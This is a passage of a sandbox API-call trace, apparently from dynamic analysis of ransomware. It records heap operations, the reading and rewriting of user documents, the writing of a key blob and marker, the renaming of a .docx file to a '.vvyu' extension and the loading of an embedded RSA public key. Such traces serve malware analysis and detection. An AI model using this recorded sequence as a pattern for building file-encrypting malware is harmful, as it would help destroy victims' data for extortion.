Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea38 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.870] GetCurrentThreadId () returned 0x264 [0184.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d370a8 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.871] GetCurrentThreadId () returned 0x264 [0184.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0184.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea98 [0184.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eab0 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea80 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eac8 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea80 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea98 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eac8 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0184.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0184.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eab0 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41920 | out: hHeap=0x6a0000) returned 1 [0184.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.882] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x14359, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x14359, lpOverlapped=0x0) returned 1 [0184.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.884] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1435e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.884] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0184.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0184.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.885] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0184.885] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.886] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.886] CloseHandle (hObject=0x584) returned 1 [0184.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0184.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.888] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\oO9yXvHfzy447m.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oo9yxvhfzy447m.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\oO9yXvHfzy447m.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\oo9yxvhfzy447m.docx.vvyu")) returned 1 [0184.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0184.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.889] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.892] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c31700 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0184.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2d41920 [0184.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82ab8 | out: hHeap=0x6a0000) returned 1 [0184.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0184.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0184.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0184.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0184.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0184.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0184.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.896] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaceaf150, ftCreationTime.dwHighDateTime=0x1d86078, ftLastAccessTime.dwLowDateTime=0x828f92a0, ftLastAccessTime.dwHighDateTime=0x1d89488, ftLastWriteTime.dwLowDateTime=0x828f92a0, ftLastWriteTime.dwHighDateTime=0x1d89488, nFileSizeHigh=0x0, nFileSizeLow=0x4e59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P1nruY.xlsx", cAlternateFileName="P1NRUY~1.XLS")) returned 1 [0184.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38688 [0184.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38688 | out: hHeap=0x6a0000) returned 1 [0184.897] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\P1nruY.xlsx") returned=".xlsx" [0184.897] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\P1nruY.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\p1nruy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.898] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=20057) returned 1 [0184.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.902] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4e33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.902] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.904] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.904] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x4e59, lpOverlapped=0x0) returned 1 [0184.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.905] lstrlenA (lpString="-----BEGIN PUBLIC 